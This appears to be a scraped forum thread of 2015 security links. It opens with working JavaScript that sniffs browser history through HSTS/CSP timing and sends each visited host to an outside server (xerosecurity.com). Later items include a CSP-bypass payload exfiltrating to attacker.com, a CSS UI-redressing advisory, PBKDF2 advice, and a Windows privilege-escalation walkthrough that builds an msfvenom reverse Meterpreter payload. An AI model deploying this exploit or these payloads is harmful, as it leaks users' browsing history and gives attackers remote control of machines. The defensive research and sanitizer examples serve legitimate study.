'http://www.airbnb.es/', 'http://www.airbnb.it/', 'http://www.airbnb.fr/', 'http://www.airbnb.co.kr/', 'http://www.airbnb.de/', 'http://www.airbnb.co.uk/', 'http://www.airbnb.com.au/', 'http://www.airbnb.ca/', 'http://www.airbnb.co.in/', 'http://www.airbnb.com.br/', 'http://www.airbnb.ru/', 'http://www.centrum24.pl/centrum24-web/login', 'http://coursera.org/', 'http://ellislab.com/', 'http://www.udacity.com/', 'http://bitcointalk.org/', 'http://uwaterloo.ca/', 'http://vc.ru/', 'http://tjournal.ru/', 'http://www.biblegateway.com/', 'http://www.themuse.com', 
'http://att.yahoo.com/', 'http://www.yahoo.com/', 'http://ficbook.net/', 'http://www.ameriprise.com/', 'http://www.here.com/', 'http://www.rocketlawyer.com/', 'http://exmo.com/', 'http://skladchik.com/', 'http://healthunlocked.com/', 'http://www.upwork.com/', 'http://www.thegioididong.com/', 'http://fermasosedi.ru/', 'http://www.thegrommet.com/', 'http://www.freelancer.com/', 'http://www.freelancer.in/', 'http://klout.com/', 'http://www.veikkaus.fi/', 'http://www.lucidchart.com/', 'http://www.opensuse.org/', 'http://monitorbacklinks.com/', 'http://www.5giay.vn/', 'http://noncombatant.org/', 'http://nonfreesoftware.org/', 'http://hackpad.com/', 'http://meta.discourse.org/', 'http://devinegan.com/', 'http://ongardie.net/', 'http://titanous.com/', 'http://www.funkthat.com', 'http://nelhage.com/', 'http://yawnbox.com/', 'http://rednerd.com', 'http://smbmarketplace.cisco.com/', 'http://www.cloudflare.com/', 'http://letsencrypt.org/', 'http://helloworld.letsencrypt.org/', 'http://hoffman-andrews.com/', 'http://jdkasten.com/', 'http://jhalderm.com/', 'http://jve.linuxwall.info/' ];

/**
 * Gets hostname from URL.
 */
function getHost_(url) {
  return url.replace('http://', '').split(/\/|\?/)[0];
}

/**
 * Our CSP policy (HTTP-only images) causes this to fire whenever the img src
 * redirects to HTTPS, either by HSTS (307) or plain old redirects (301/302).
 * @param {number} start Time when the image load started
 * @param {string} host The host that fired the error
 * @private
 */
function onImgError_(start, host) {
  var time = new Date().getTime() - start;
  if (host === BENCHMARK_HOST) {
    // This is just a calibration measurement so update the offset time.
    OFFSET = time;
  } else {
    // We need to subtract offset, otherwise hosts that are further down on the
    // page seem to have higher load times because of the time that it took for
    // the DOM to load.
    display(host, time - OFFSET, OFFSET);
  }
}

/**
 * Double-check whether hosts have been visited by trying synchronous image
 * loads, which have cleaner timing profiles. I find this helps reduce the
 * false positive rate in Chrome. AFAICT, the async image-load sniffing method
 * works great in Firefox so this isn't necessary there.
 * @param {function(string, number)} callback Gets called when img error fires.
 * @param {function()} finished Called when all loads are done.
 * @private
 */
function confirmVisited_(callback, finished) {
  var initial; // initial time
  var img = new Image();
  var timeouts = []; // array of timeout IDs
  var hostsDone = [];
  var dummySrc = 'http://example.com/'; // URL for timer initialization

  function clearTimeouts_() {
    // Clear existing timeouts
    timeouts.forEach(function(id) {
      window.clearTimeout(id);
    });
    timeouts = [];
  }

  function doNext_() {
    if (visited.length === 0) {
      finished();
      return;
    }
    // Shift instead of pop since we are pushing hosts into the array while
    // this is running
    var host = visited.shift();
    initial = new Date().getTime();
    var src = 'http://' + host + '/?' + initial.toString();
    img.src = src;
    // Abort after 20ms since positive results should take less time anyway
    timeouts.push(window.setTimeout(img.onerror.bind({ src: src }),
                                    TIMING_CONFIRM_THRESHOLD));
  }

  img.onerror = function() {
    if (this.src !== dummySrc) {
      clearTimeouts_();
      var host = getHost_(this.src);
      if (hostsDone.indexOf(host) !== -1) {
        // We might have called the callback for this host already.
        console.log('already done, skipping', host);
      } else {
        hostsDone.push(host);
        callback(host, new Date().getTime() - initial);
      }
    } else {
      console.log('initialized timer using', this.src);
    }
    doNext_();
  };

  img.onload = function() {
    // Should never happen but add a callback in case so it doesn't block the
    // rest of the image requests from being sent.
    console.log('UNEXPECTEDLY LOADED', this.src);
    doNext_();
  };

  // Set the image source initially to a dummy URL b/c the first load seems to
  // always take a long time no matter what.
  img.src = 'http://example.com/';
}

/**
 * Times how long a request takes by loading it as an img src and waiting for
 * the error to fire. I would use XHR here but it turns out CORS errors fire
 * before CSP.
 * @param {string} host
 */
function timeRequest(host) {
  var img = new Image();
  img.onerror = onImgError_.bind(this, new Date().getTime(), host);
  // Add random params so we don't hit the cache
  img.src = host + '?' + Math.random().toString().substring(2);
}

/**
 * Measures the calibration drift so we have a better estimate of how long
 * a resource fetch actually took. Since we expect the time T to fetch a
 * preloaded STS host to be ~constant, the fact that it changes indicates
 * that our timing is getting skewed by some amount, probably due to DOM
 * processing. Correct for the skew by subtracting T from measurements that
 * happen shortly after.
 */
function calibrateTime() {
  timeRequest(BENCHMARK_HOST);
}

/**
 * Display the results.
 * @param {string} url
 * @param {number} time
 * @param {number} offset
 */
function display(url, time, offset) {
  var li = document.createElement('li');
  var host = getHost_(url);
  li.id = host;
  li.appendChild(document.createTextNode(host));
  if (time < TIMING_UPPER_THRESHOLD && time > TIMING_LOWER_THRESHOLD) {
    if (!isFirefox) {
      // If we are in Chrome, hide the results for now because the false
      // positive rate is really high until confirmVisited_() is called.
      li.style.color = 'lightgray';
    }
    visitedElem.appendChild(li);
    visited.push(host);

    // +--== [ Remote Exploit by 1N3 @ CrowdShield - https://crowdshield.com
    // Change uri to your own web server: each host judged "visited" is
    // reported there via a GET request.
    var uri_visited = host;
    var uri = "http://xerosecurity.com/?redir=" + host;
    var port = 80;
    var xhr = new XMLHttpRequest();
    xhr.open("GET", uri + ":" + port, true);
    xhr.send();
  } else {
    notVisitedElem.appendChild(li);
  }
}

if (!isFirefox) {
  // Chrome needs to do an extra timing confirmation step for results to be not
  // shitty. Wait 3 seconds for the async loads to mostly finish, then try one
  // synchronous load for each potentially-visited host.
  disclaimer.style.display = '';
  window.setTimeout(function() {
    confirmVisited_(function(host, t) {
      if (!disclaimer.done_) {
        disclaimer.style.color = 'orange';
        disclaimer.innerText = 'Removing false positives . . .';
        disclaimer.done_ = true;
      }
      var elem = document.getElementById(host);
      if (!elem) {
        console.warn('No element found', host);
        return;
      }
      if (t <= TIMING_CONFIRM_THRESHOLD / 2) {
        console.log('showing', host, t);
        elem.style.color = '';
      } else {
        console.log('hiding', host, t);
        elem.style.display = 'none';
        notVisitedElem.appendChild(elem);
      }
    }, function() {
      disclaimer.style.color = 'green';
      disclaimer.innerText = 'Done!';
      saveCrypto_(!notVisitedElem.querySelector('#savecrypto\\.org'));
    });
  }, 3000);
} else {
  window.setTimeout(function() {
    saveCrypto_(visitedElem.querySelector('#savecrypto\\.org'));
  }, 3000);
}

/**
 * Tell the user to sign this awesome petition if they haven't visited it!
 * Thank them if they have!
 * @param {Boolean} signed
 * @private
 */
function saveCrypto_(signed) {
  var text = signed ?
      'PS: Thanks for signing <a href="https://savecrypto.org">savecrypto.org</a>! <3' :
      'PS: Tell Obama to support strong encryption! Sign the petition at <a href="https://savecrypto.org">savecrypto.org</a>.';
  disclaimer.style.display = '';
  disclaimer.style.color = 'blue';
  disclaimer.innerHTML = text;
}

// Main loop
hosts.forEach(function(host) {
  calibrateTime();
  timeRequest(host);
});

Published by CrowdShield on 11/26/2015
Source: https://crowdshield.com/blog.php?name=remotely-sniffing-browser-history-via-xss-using-hsts-csp
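The sniff above only works because of a piece of browser state the post never shows: the HSTS policy cache. An http:// image request to a host with a live HSTS entry is rewritten to https:// before any network I/O (the "307 internal redirect"), so a CSP of img-src http: blocks it and onerror fires far faster than a real round trip. The block below is an added example, not CrowdShield's code: it models that cache (RFC 6797 header parsing, expiry, includeSubDomains, max-age=0 removal, and the rule that the header is ignored over plain HTTP) so the timing signal the exploit relies on can be reasoned about offline. Treating letsencrypt.org as a preloaded host is an assumption made for the example; the host list on the page is not consulted.

```javascript
// Added example (not from the CrowdShield post): a minimal model of the
// browser-side HSTS state that the history sniff above depends on.
'use strict';

// Parse a Strict-Transport-Security header value (RFC 6797 section 6.1).
// Returns null for values a browser must ignore: missing max-age, a malformed
// number, or a duplicated directive. Unknown directives (e.g. "preload") are skipped.
function parseHsts(headerValue) {
  let maxAge = null;
  let includeSubDomains = false;
  for (const raw of headerValue.split(';')) {
    const directive = raw.trim();
    if (!directive) continue;
    const eq = directive.indexOf('=');
    const name = (eq === -1 ? directive : directive.slice(0, eq)).trim().toLowerCase();
    let value = eq === -1 ? null : directive.slice(eq + 1).trim();
    if (value && value.startsWith('"') && value.endsWith('"')) value = value.slice(1, -1);
    if (name === 'max-age') {
      if (maxAge !== null || value === null || !/^\d+$/.test(value)) return null;
      maxAge = Number(value);
    } else if (name === 'includesubdomains') {
      includeSubDomains = true;
    }
  }
  if (maxAge === null) return null;
  return { maxAge, includeSubDomains };
}

// A tiny HSTS policy store keyed by host. `now` (ms) is passed in so the
// behaviour is deterministic and testable.
class HstsStore {
  constructor(preloaded = []) {
    this.entries = new Map();
    // Preloaded hosts never expire, which is exactly what makes a preload-list
    // host usable as BENCHMARK_HOST for timing calibration in the sniff above.
    for (const h of preloaded) {
      this.entries.set(h.toLowerCase(), { expires: Infinity, includeSubDomains: true });
    }
  }

  // Record a header seen on a response. RFC 6797 requires the header to be
  // ignored on http:// responses, so a plain-HTTP MITM cannot plant a policy.
  observe(host, scheme, headerValue, now) {
    if (scheme !== 'https') return false;
    const policy = parseHsts(headerValue);
    if (!policy) return false;
    const key = host.toLowerCase();
    if (policy.maxAge === 0) { this.entries.delete(key); return true; } // explicit removal
    this.entries.set(key, {
      expires: now + policy.maxAge * 1000,
      includeSubDomains: policy.includeSubDomains,
    });
    return true;
  }

  // Would the browser rewrite http://host/... to https:// at time `now`?
  // Walks from the full host up to the registrable parent, honouring
  // includeSubDomains and dropping expired entries on the way.
  upgrades(host, now) {
    const labels = host.toLowerCase().split('.');
    for (let i = 0; i < labels.length - 1; i++) {
      const candidate = labels.slice(i).join('.');
      const e = this.entries.get(candidate);
      if (!e) continue;
      if (e.expires <= now) { this.entries.delete(candidate); continue; }
      if (i === 0 || e.includeSubDomains) return true;
    }
    return false;
  }
}
```

In the sniff, `upgrades(host, now) === true` is the condition under which the img request dies at the CSP check instead of on the wire, which is why a fast onerror is read as "visited". The same store shows why the leak is hard to close on the server side: a site that sets a long max-age leaves a client-side marker the client itself cannot distinguish from a cross-origin probe.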
  6. HITBGSEC 2015 - Dawid Czagan - Hacking Cookies in Modern Web Applications and Browsers

PRESENTATION MATERIALS: Index of /materials/sg2015

PRESENTATION ABSTRACT:
Since cookies store sensitive data (session ID, CSRF token, etc.) they are interesting from an attacker's point of view. As it turns out, quite a few web applications (including sensitive ones like bitcoin platforms) have cookie-related vulnerabilities that lead, for example, to user impersonation, remote cookie tampering, XSS and more. Developers tend to forget that multi-factor authentication will not help when cookies are insecurely processed. Security evaluators underestimate cookie-related problems. Moreover, there are problems with secure processing of cookies in modern browsers, and browser-dependent exploitation can be used to launch more powerful attacks. That's why secure cookie processing (from the perspective of the web application and the browser) is a subject worth discussing.

The following topics will be presented:
– cookie-related vulnerabilities in web applications
– insecure processing of the secure flag in modern browsers
– bypassing the HttpOnly flag in Safari
– problem with the Domain attribute in Internet Explorer
– cookie tampering in Safari
– underestimated XSS via cookie
– HTTP Strict Transport Security (HSTS) – importance of regeneration
– and more

ABOUT DAWID CZAGAN
Dawid Czagan (@dawidczagan) has found security vulnerabilities in Google, Yahoo, Mozilla, Microsoft, Twitter, BlackBerry and other companies. Due to the severity of many bugs, he received numerous awards for his findings. Dawid is founder and CEO at Silesia Security Lab, which delivers specialized security auditing and training services. He also works as Security Architect at Future Processing. Dawid shares his security bug hunting experience in his hands-on training "Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more". He delivered security trainings/workshops at Hack In The Box (Amsterdam), CanSecWest (Vancouver), DeepSec (Vienna), Hack In Paris (Paris) and for many private companies. He also spoke at the Security Seminar Series (University of Cambridge) and published over 20 security articles (InfoSec Institute).
  7. Nytro

    CSP 2015

    (the injected part is "><meta http-equiv="refresh" content='0;url=http://attacker.com/?>)

    Since browsers can handle only one redirection, they have to pick only one of the three. Some browsers use the first one and some use the last one, but never the middle one. That is troublesome because we only care about the middle one.

    Now think about it: does CSP really cover all the possible ways to fetch resources? Another no. HTTPLeaks is a project that aims to enumerate all possible ways browsers leak requests. They can be something specific to browsers, features defined by new specifications, and whatnot. The most important thing is that some of them will not be caught by CSP. In the attack I used prefetch from Resource Hints.

    Finally

    We just need to prevent the intended redirection so that our prefetch request will not be dropped. This can be done using the javascript: pseudo-protocol, as browsers refuse to navigate to it in a meta refresh. Now everything is set, and the final payload:

    javascript:"><link rel=prefetch href='//attacker.com/? ...

    Hooray! Access granted. CSP: 0.5 - Attacker 2.5. Fatality. You can find the original report on HackerOne.

    Takeaway
    - A proper policy can significantly reduce the chance of XSS
    - Beware of the nonce pitfall
    - Content exfiltration may be the Achilles' heel of CSP
    - All in all, CSP does not replace input validation

    Source: http://blog.innerht.ml/csp-2015/
  8. November 23, 2015
Abusing CSS Selectors to Perform UI Redressing Attacks
Jovon Itwaru, Information Security Engineer

Introduction

Earlier this year, we received an interesting security advisory from Ruben van Vreeland of BitSensor regarding an issue discovered within our publishing platform. The technique Ruben described is unique and exemplifies the creativity needed to produce high-quality research. We analyzed his report and resolved the vulnerability. While we typically do not talk about bugs that we receive, the lesson learned and the uniqueness of this issue are worth sharing. In this blog post, we will describe Ruben's novel attack that allows attackers to use existing CSS and style attributes to trick members into navigating to an attacker-controlled location, leading to potential social engineering and phishing attacks.

Description

As part of our publishing platform, we allow members to customize the look and feel and even share rich media content on their blog articles. This involves styling content with CSS, formatting with a subset of HTML elements, and also sharing audio/video resources. To mitigate certain classes of vulnerabilities such as XSS, a limited set of HTML tags (e.g. <img>, <a>, <p> and <br>) and safe attributes are allowed.

Let's dive into a simplified example that illustrates this technique. For instance, to create a blog entry, the following JSON request can be used to generate a new HTML page with an image tag and URL link.

{"content": "<p><a href=\"http://www.linkedin.com\">LinkedIn</a><img src=\"linkedin.png\"/></p>"}

(Figure: Resulting HTML page)

Rigorous input validation is performed on these elements to ensure attackers cannot introduce attributes or event handlers that could be used to construct XSS attacks. In some scenarios, it is possible to introduce benign attributes such as class that will not be flagged by the input validation filter. While this would not be a vulnerability by itself, Ruben realized that it can be used to reference existing CSS hosted on our site. Considering the extent of the platform, we have many CSS classes that are available on our CDNs and consumed by other products. For example, the following CSS styles are applied to the response page that renders blog entries:

<style>
.li_style {
  position: absolute;
  width: 100%;
  z-index: 10021;
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  padding: 0;
  overflow-y: scroll;
  _overflow-y: hidden
}
</style>

This type of style is a common way to force an element to stretch the entire height and width of a page. With knowledge of this available CSS style, we can resubmit the request and reference this style:

{"content": "<p><a class=\"li_style\" href=\"http://www.example.com\">Example Site</a><img src=\"image.png\"/></p>"}

(Figure: The li_style covers the entire page.)

This, in turn, allows the page area to become clickable with a link to Example Domain.

Impact and Recommendation

As illustrated, an attacker can reuse trusted CSS class selectors to perform UI changes that are invisible to members. We believe that this attack is applicable to many sites, as many allow members to create and share rich media content. This is an interesting technique that uses existing resources to facilitate UI-redressing attacks by chaining together CSS class selectors, and has similarities to Return Oriented Programming (ROP). This technique can be used to send members to sites hosting malware or counterfeit sites that attempt to phish members by requesting their usernames and passwords. This is especially successful on social sites that share blogs or articles.

As such, our recommendation is to only accept safe elements and attributes. For example, if the class attribute is not allowed, reject any request that contains it. Additionally, whitelist filtering should be applied to CSS class selectors to permit only necessary styles.

We would like to thank Ruben for reporting this issue and helping keep our members safe. Thanks to his excellent work and communication with our team, Ruben was invited to join our private bug bounty program, hosted by HackerOne. This is one of many examples of the collaborations we experience with the talented researchers in our program. If you have a bug you would like considered, please submit to security@linkedin.com.

Source: https://security.linkedin.com/blog-archive#11232015
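The recommendation at the end of the post (allow only safe tags and attributes, and whitelist class selectors) as an added example, not LinkedIn's code. It runs over the post's own payload and keeps the allowed tag subset (<p>, <a>, <img>, <br>) while filtering class down to an allowlist of content-only classes, so a page-level layout class such as li_style cannot be borrowed. The allowed class names and URL rules are assumptions made for the example; a production system should enforce the same policy inside a maintained HTML sanitizer rather than a regex tokenizer like this one.

```javascript
// Added example (not LinkedIn's code): tag/attribute allowlisting with a
// per-token allowlist on the class attribute, which is what defeats the
// "borrow a site-wide CSS class" UI redressing described in the post.
'use strict';

const ALLOWED_TAGS = new Set(['p', 'a', 'img', 'br']);
const ALLOWED_ATTRS = {
  p: new Set(['class']),
  a: new Set(['href', 'class']),
  img: new Set(['src', 'alt', 'class']),
  br: new Set(),
};
// Only classes intended for member content. Layout classes (li_style, ...) are
// simply absent, so they can never reach the rendered page. (Assumed names.)
const ALLOWED_CLASSES = new Set(['post-link', 'post-image']);

const TAG_RE = /<(\/?)([a-zA-Z][\w-]*)([^>]*?)\/?>/g;
const ATTR_RE = /([a-zA-Z_:][-\w:.]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

// Keep only allowlisted class tokens; drop the attribute if none survive.
function filterClass(value) {
  return value.split(/\s+/).filter(c => c && ALLOWED_CLASSES.has(c)).join(' ');
}

// Absolute http(s) or a same-site relative path. Rejects javascript:, data:
// and protocol-relative (//attacker) URLs.
function safeUrl(value) {
  const v = value.trim();
  if (/^https?:\/\//i.test(v)) return true;
  if (v.startsWith('//')) return false;
  return !v.includes(':');
}

function filterTag(closing, name, rawAttrs) {
  const tag = name.toLowerCase();
  if (!ALLOWED_TAGS.has(tag)) return '';     // drop the tag, keep surrounding text
  if (closing) return `</${tag}>`;
  const kept = [];
  for (const m of rawAttrs.matchAll(ATTR_RE)) {
    const attr = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? '';
    if (!ALLOWED_ATTRS[tag].has(attr)) continue;          // style, id, on*...
    if (attr === 'class') {
      const classes = filterClass(value);
      if (classes) kept.push(`class="${classes}"`);
    } else if (attr === 'href' || attr === 'src') {
      if (safeUrl(value)) kept.push(`${attr}="${value.replace(/"/g, '&quot;')}"`);
    } else {
      kept.push(`${attr}="${value.replace(/"/g, '&quot;')}"`);
    }
  }
  const selfClose = (tag === 'img' || tag === 'br') ? '/' : '';
  return `<${tag}${kept.length ? ' ' + kept.join(' ') : ''}${selfClose}>`;
}

// Sanitize the "content" field of a publishing request before it is stored.
function sanitizeContent(html) {
  return html.replace(TAG_RE, (_, slash, name, rawAttrs) =>
    filterTag(slash === '/', name, rawAttrs));
}
```

Run against the post's second request, the <a> loses its class attribute entirely because li_style is not in the allowlist, while the href survives; a member's own post-link class would be kept.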
  9. Now, seriously speaking, today's pseudo-journalists suck dick.
  10. "ATTENTION, to be forwarded URGENTLY: If you receive a phone call and your mobile displays 'A C E', do not answer; cancel the call. It is a virus that destroys the SIM card and destroys the phone. This has been confirmed by Motorola, Sagem and Nokia." WTF is this shit? From the comments: https://sternocleidomastoidian.wordpress.com/2010/04/14/informare-a-ministerului-de-interne/
  11. It's for real, I got root on a laser.
  12. Parameter choice for PBKDF2

PBKDF2, standardised in RFC 2898 and PKCS#5, is a function for creating a cryptographic key from a password. It is the only such function currently appearing in NIST standards, hence it has seen widespread use. The aim of the function is to create a key in such a way that dictionary attacks (where the attacker just tries a range of possible passwords) are infeasible. To do this, PBKDF2 applies a pseudorandom function (PRF) to the password many times. This means that an attacker making a guess at the password will also have to apply the function many times to his guess. Additionally, the function can be given a "salt" parameter. The idea of this is to make each key derivation operation unique, so that an attacker cannot guess one password and then look for matches against a large number of derived keys. These properties mean PBKDF2 is used not just to produce a key to be used in a cryptographic protocol, but also to store passwords securely (by storing the derived keys).

A developer using PBKDF2 must choose parameter values for the salt, the PRF, and the number of iterations, i.e. the number of times the PRF will be applied to the password when deriving the key.

The specification suggests (in section 4.1) that the salt be (or contain) a 64-bit pseudorandom value. This makes collisions (i.e. occasions when two stored passwords use the same salt) unlikely. By the birthday paradox, we would expect a collision after 2^32 passwords, i.e. a little more than 4 billion.

The PRF mentioned in the specification is SHA-1, and in many libraries this is the only choice. However, using SHA-256 or SHA-512 has the benefit of significantly increasing the memory requirements, which increases the cost for an attacker wishing to attack using hardware-based password crackers based on GPUs or ASICs.

The recommended iteration count in the RFC published in September 2000 was 1000. Computing performance has greatly increased since then. Modern guides such as the OWASP password storage cheat sheet (2015) recommend 10000 iterations. NIST's own guide (Appendix A.2.2) recommends that the iteration count be "as high as can be tolerated while still allowing acceptable server performance".

Cracking Stuff

What are the consequences of a low iteration count? Imagine we are restricted to using SHA-1 as our PRF, as is the case for example in PKCS#11 up to version v2.20. How long would it take a well-resourced attacker (i.e. with access to GPUs) to break an 8-character password?

First we have to estimate how much entropy or "randomness" there is in an 8-character password. An excellent paper by Kelley et al. from IEEE Security and Privacy 2012 found that when users are forced to choose a password following the "Comprehensive8" policy ("Password must have at least 8 characters including an uppercase and lowercase letter, a symbol, and a digit. It may not contain a dictionary word."), the result is roughly 33 bits of entropy. If, however, the password is a perfectly random combination of uppercase and lowercase letters, numbers and the 30 symbols on a US keyboard, we would expect 52 bits of entropy. Interestingly, the same result can be obtained by choosing 4 random words from the Diceware list.

Second, we need to know how fast GPUs can calculate PBKDF2. An article from April 2013 reports a rate of 3 million PBKDF2 guesses per second on a typical GPU setup. This includes calculating AES once for each guess (to see if the right key has been derived to decrypt a master key file), and it's now November 2015, so suppose conservatively we can apply Moore's law almost once since then (whether one can apply Moore's "law" to GPUs is doubtful), giving a very rough rule-of-thumb ability of 5 million guesses per second on typical GPU hardware. The table below shows how long an attacker would take to cover the whole password space of a single salted hashed password.

Password complexity                                           | Entropy estimate (bits) | 1000 iterations    | 10000 iterations
------------------------------------------------------------- | ----------------------- | ------------------ | -----------------
Comprehensive8                                                | 33                      | 4 hours 46 minutes | 47 hours
8 random lowercase letters                                    | 37                      | 12 hours           | 5 days
8 random letters                                              | 45                      | 123 days           | 3 years 5 months
8 letters + numbers + punctuation OR 4 random Diceware words  | 52                      | 325 years          | 3250 years

Conclusions

If you have to use PBKDF2, you should:
- use a unique 64-bit salt for each password;
- use SHA-512, or failing that SHA-256, rather than SHA-1 if you can;
- use an iteration count of at least 10000, more if you can do it "while still allowing acceptable server performance".

In a future blog post, we'll cover other password hashing functions like bcrypt, scrypt, and the winner of the recent password hashing competition, Argon2.

Source: https://cryptosense.com/parameter-choice-for-pbkdf2/
  13. Samsung S6 calls open to man-in-the-middle base station snooping
Research duo pop baseband chip in preliminary demo-hack
12 Nov 2015 at 05:56, Darren Pauli

PacSec Modern Samsung devices including the S6, S6 Edge and Note 4 can have phone calls intercepted using malicious base stations, according to initial research findings from two researchers.

Daniel Komaromy and Nico Golde demonstrated the attacks on Samsung's 'Shannon' line of baseband chips today at the Mobile Pwn2Own competition at PacSec, Tokyo. Full exploitation details of their research have not been publicly detailed, but they have been disclosed to Samsung.

Their cheap man-in-the-middle attack requires an OpenBTS base station to be established and located near target handsets. Handsets will automatically connect to the bogus station. The malicious base station then pushes firmware to the phone's baseband processor (the chip that handles voice calls, and which isn't directly accessible to end users). The firmware patch pushes phone calls through the bogus base station, which redirects them to a proxy that records them and passes them on to the intended recipient.

Komaromy says the full impact of the attack along with any mitigating factors will be known once seasoned researchers examine their work.

"Our example of modifying the baseband to hijack calls is just an example," Komaromy told Vulture South. "The idea with hijacking would be that you can redirect calls to a proxy (like a SIP proxy) and that way you can man-in-the-middle the call.

"So that means the caller sees her original call connected - but it can be recorded in the proxy [which is how] it's like a wiretap implant."

(Photo: Nico Golde (l) and Daniel Komaromy at Pwn2Own today. Credit: Dragos Ruiu)

The attack was tested on a new Samsung Galaxy S6 Edge which PacSec organiser Dragos Ruiu took out of its box and updated before handing it over.

"I turned it on next to their radio and then dialled myself," Ruiu says of the demonstration, held deep below the Tokyo conference to avoid pwning delegate phones. "And instead of ringing on my phone it rang on theirs."

The hacker duo now own the phone as a prize and will in March travel to Canada for CanSecWest on a ski trip along with their spouses. They will present further technical detail of the attack at that lauded conference.

It comes as Chinese researcher Guang Gong popped the latest version of Google Chrome at the contest. As El Reg reported, the attack likely affects all Android phones and allows the devices to be completely compromised through a single exploit that requires no interaction beyond visiting a crafted web site.

Ruiu is offering ski trips and vendors may cough up bug bounties in exchange for the winning hacks. Last year hackers hosed popular phones for shares in $425,000 in cash rewards, but security sponsors Google, Apple, Microsoft and Hewlett Packard's Zero Day Initiative pulled out. ®

Source: Samsung S6 calls open to man-in-the-middle base station snooping • The Register
  14. Senior IT Auditor

What are we looking for? A Senior IT Auditor for our Advisory team.

Candidate profile:
• Conduct IT audits in accordance with IT audit methodology and other relevant standards;
• Strong ability to articulate the business risks of identified deficiencies to client personnel;
• Identify and communicate findings to client personnel;
• Recognize performance improvement opportunities for clients.

Requirements:
• Bachelor's degree in an IT-related field
• Minimum 2 years of experience in IT audits
• Ability to identify risks and controls in various IT systems (applications, computer networks, operating systems, databases)
• Ability to test IT controls (entity level, IT general controls, application level) and to identify compensating controls
• Basic knowledge of various IT environments
• Very good technical and business English
• Ability to identify and resolve IT-related business issues and provide innovative solutions for both IT and business
• Work effectively either individually or as a member of a multi-skilled team
• Professional discipline, accuracy, reliability and excellent analytical skills
• Strong interpersonal skills, team spirit, resilience, flexibility, adaptability and self-motivation
• Certifications such as CISA, CISSP, CRISC or ISO 27001 will be considered a plus

Our offer:
• A competitive salary and benefits package
• The chance to develop a rewarding professional path and work on challenging assignments
• Support for professional qualifications and personal development through a strong mentoring program
• Work in a friendly team of security professionals who enjoy sharing their experience with colleagues
• The opportunity to participate in a wide variety of technical projects and client environments
• Flexible working program

We look forward to receiving your CV and letter of motivation, in English, by December 15th, 2015. Shortlisted candidates will be invited to interview.

Link: http://www.bestjobs.ro/locuri-de-munca-senior-it-auditor/228141/2

Note:
1. The job is not security-related.
2. It is aimed at people who have done this kind of work before.

Info (I think): https://en.wikipedia.org/wiki/Information_technology_audit

If you need more information you can PM me. If you want your CV to be seen quickly by the right person, you can PM me.
  15. Black Hat USA 2015 - Red vs Blue: Modern Active Directory Attacks, Detection, and Protection
  16. A sponsorship from Starbucks, Gloria Jeans or whatever would come in handy. It would even bring @aelius there, even if he were in Germany.
  17. OpenVPN for paranoids
Tue 17 November 2015
By Victor Dorneanu

Continuing my admin series, this time I'd like to set up a VPN using OpenVPN as a user-based VPN solution. Unlike IPSec solutions, which require IPSec on both (server and client) sides, securing the VPN tunnel with OpenSSL is a preferable option. In this post I'll try to show which steps have to be taken in order to:
- secure the communication channel
- use up-to-date (and secure!) TLS configurations
- prevent information leaks when the VPN tunnel is down

At least for the last one, some additional steps are required to route your traffic only through the VPN tunnel. As a client you don't want your connection to be "downgraded" (in terms of security) without even realizing it. That's why you might want to restrict your routes and allow outbound connections only through the (virtual) interface dedicated to the VPN. How this is done and which methods exist is covered later on.

Full article: OpenVPN for paranoids - blog.dornea.nu
  18. Posted on November 24, 2015 by Jonathan Common Windows Privilege Escalation Vectors Imagine this scenario: You’ve gotten a Meterpreter session on a machine (HIGH FIVE!), and you opt for running getsystem in an attempt to escalate your privileges… but what that proves unsuccessful? Should you throw in the towel? Only if you’re a quitter… but you’re not, are you? You’re a champion!!! In this post I will walk us through common privilege escalation techniques on Windows, demonstrating how to “manually” accomplish each task as well as talk about any related Metasploit modules. While most techniques are easier to exploit when escalating from Local Administrator to SYSTEM, improperly configured machines can certainly allow escalation from unprivileged accounts in the right circumstances. Note: In this post, we will focus on escalation techniques that do not rely on kernel exploits such as KiTrap0d (which just so happens to be one of four methods attempted by Meterpreter’s getsystem.) Trusted Service Paths This vulnerability deals with how Windows interprets spaces in a file path for a service binary. Given that these services often run as SYSTEM, there is an opportunity to escalate our privileges if we can exploit this behavior. For example, consider the following file path: C:\Program Files\Some Folder\Service.exe For each space in the above file path, Windows will attempt to look for and execute programs with a name that matches the word in front of space. The operating system will try all possibilities throughout the entire length of the file path until it finds a match. Using the example above, Windows would try to locate and execute programs in the following order: C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder\Service.exeNote: This behavior happens when a developer fails to enclose the file path in quotes. File paths that are properly quoted are treated as absolute and therefore mitigate this vulnerability. 
As a result, you may see this vulnerability referred to as “Unquoted Service Paths.” If we were to drop a properly-named malicious executable in an affected folder, upon a restart of the service, we could have our malicious program run as SYSTEM (in a majority of cases). However, prior to dropping an executable, we would have to ensure that we had the necessary privileges to the target folder (organizations with least privilege properly implemented would prevent us from dropping an executable at the root of the drive). Let’s go ahead and step through the process of identifying and exploiting this vulnerability… To start, we can utilize the following one-line Windows Management Instrumentation (WMI) query, written by Danial Compton (@commonexploits), to list all unquoted service paths (minus built-in Windows services) on our compromised machine, GREED: wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ As you can see, we have a hit! The path for PFNet’s service binary is unquoted and contains spaces. If the stars align, we will also have the necessary folder permissions. Assuming we’ve already checked our permissions on the root of the drive, let’s use the built-in Windows tool, Integrity Control Access Control Lists (icacls), to view the permissions of the other affected folder in the path, Privacyware icacls "C:\Program Files (x86)\Privacyware" Notice the first line: BUILTIN\Users:(OI)(CI)(M), which lists the permissions for unprivileged users. The (M) stands for Modify, which grants us, as an unprivileged user, the ability to read, write and delete files and subfolders within this directory. WHAT LUCK! We are now free to create and drop a malicious executable called Privatefirewall.exe… let’s begin! Note: We would be able to accomplish the same task if we had Write (W) permissions to the Privacyware folder. 
For more information on Windows permissions, check out the following MSDN link: File and Folder Permissions.

When creating an executable with MSFVenom, you may wish to have your payload simply add a user to the Local Administrators group (windows/adduser) or send you a reverse Meterpreter shell running as SYSTEM (as demonstrated below). Other options are certainly possible!

msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe

